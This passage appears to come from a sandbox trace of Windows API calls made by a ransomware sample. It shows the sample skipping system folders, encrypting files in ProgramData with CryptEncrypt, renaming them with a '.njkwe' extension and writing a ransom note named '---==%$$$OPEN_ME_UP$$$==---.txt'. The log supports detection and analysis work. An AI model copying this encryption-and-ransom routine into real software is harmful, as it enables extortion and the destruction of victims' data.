nFileSizeLow=0x1cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0076.086] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0076.086] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0076.086] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0076.086] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0076.086] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0076.086] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml") returned 97 [0076.086] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0076.086] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.086] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0076.086] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.086] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.086] GetTickCount () returned 0x11535d2 [0076.086] GetTickCount () returned 0x11535d2 [0076.086] GetTickCount () returned 0x11535d2 [0076.086] GetTickCount () returned 0x11535d2 [0076.086] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0076.086] GetProcessHeap () returned 0xbe0000 [0076.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.086] ReadFile (in: hFile=0x438, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f04c*=0x1cc, lpOverlapped=0x0) returned 1 [0076.087] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.087] WriteFile (in: hFile=0x438, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f04c*=0x1cc, lpOverlapped=0x0) returned 1 [0076.087] GetProcessHeap () returned 0xbe0000 [0076.087] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.087] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.088] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0076.090] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0076.090] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0076.094] CloseHandle (hObject=0x438) returned 1 [0076.095] GetProcessHeap () returned 0xbe0000 [0076.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.095] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0076.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.099] GetProcessHeap () returned 0xbe0000 [0076.099] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.099] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e0f327, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e0f327, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e0f327, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0076.100] FindClose (in: hFindFile=0xc19de0 | out: hFindFile=0xc19de0) returned 1 [0076.100] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0076.100] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.101] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0076.101] CloseHandle (hObject=0x434) returned 1 [0076.102] GetProcessHeap () returned 0xbe0000 [0076.102] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.102] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0076.102] FindClose (in: hFindFile=0xc19ee0 | out: hFindFile=0xc19ee0) returned 1 [0076.102] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0076.102] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.103] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0076.104] CloseHandle (hObject=0x430) returned 1 [0076.104] GetProcessHeap () returned 0xbe0000 [0076.104] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0076.104] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", cAlternateFileName="{9AEC5~1")) returned 1 [0076.104] lstrcmpiW (lpString1="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="Windows") returned -1 [0076.104] lstrcmpiW (lpString1="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="$Recycle.bin") returned 1 [0076.104] lstrcmpiW (lpString1="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="System Volume Information") returned -1 [0076.104] lstrcmpiW (lpString1="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="Program Files") returned -1 [0076.104] lstrcmpiW (lpString1="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="Program Files (x86)") returned -1 [0076.104] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}") returned 80 [0076.104] lstrcmpW (lpString1="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2=".") returned 1 [0076.104] lstrcmpW (lpString1="{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="..") returned 1 [0076.104] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.104] GetProcessHeap () returned 0xbe0000 [0076.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0076.104] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*") returned 82 [0076.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0076.105] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.105] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.105] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.105] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.105] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.105] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\.") returned 82 [0076.105] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.105] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.105] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.105] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.105] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.105] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.105] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.105] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\..") returned 83 [0076.105] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.105] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.105] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5410decf, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x5410decf, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x5410decf, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1cc1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0076.105] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0076.105] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0076.105] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0076.105] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0076.105] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0076.105] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml") returned 99 [0076.105] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0076.105] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.105] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0076.105] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.105] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.106] GetTickCount () returned 0x11535e1 [0076.106] GetTickCount () returned 0x11535e1 [0076.106] GetTickCount () returned 0x11535e1 [0076.106] GetTickCount () returned 0x11535e1 [0076.106] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.106] GetProcessHeap () returned 0xbe0000 [0076.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.106] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x1cc1, lpOverlapped=0x0) returned 1 [0076.108] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffe33f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.108] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x1cc1, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x1cc1, lpOverlapped=0x0) returned 1 [0076.108] GetProcessHeap () returned 0xbe0000 [0076.108] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.108] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.108] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.109] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.109] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.109] CloseHandle (hObject=0x434) returned 1 [0076.109] GetProcessHeap () returned 0xbe0000 [0076.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.109] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0076.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.109] GetProcessHeap () returned 0xbe0000 [0076.109] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.109] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54002dee, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x54002dee, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x54002dee, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0076.109] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0076.109] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0076.110] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0076.110] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0076.110] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0076.110] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml") returned 100 [0076.110] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0076.110] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.110] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0076.110] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.110] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.110] GetTickCount () returned 0x11535f1 [0076.110] GetTickCount () returned 0x11535f1 [0076.110] GetTickCount () returned 0x11535f1 [0076.111] GetTickCount () returned 0x11535f1 [0076.111] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.111] GetProcessHeap () returned 0xbe0000 [0076.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.111] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.112] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.112] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.112] GetProcessHeap () returned 0xbe0000 [0076.112] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.112] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.112] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.115] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.115] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.115] CloseHandle (hObject=0x434) returned 1 [0076.115] GetProcessHeap () returned 0xbe0000 [0076.115] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.115] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0076.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.116] GetProcessHeap () returned 0xbe0000 [0076.116] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.116] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0076.116] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0076.116] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0076.116] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0076.116] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0076.116] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0076.116] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: 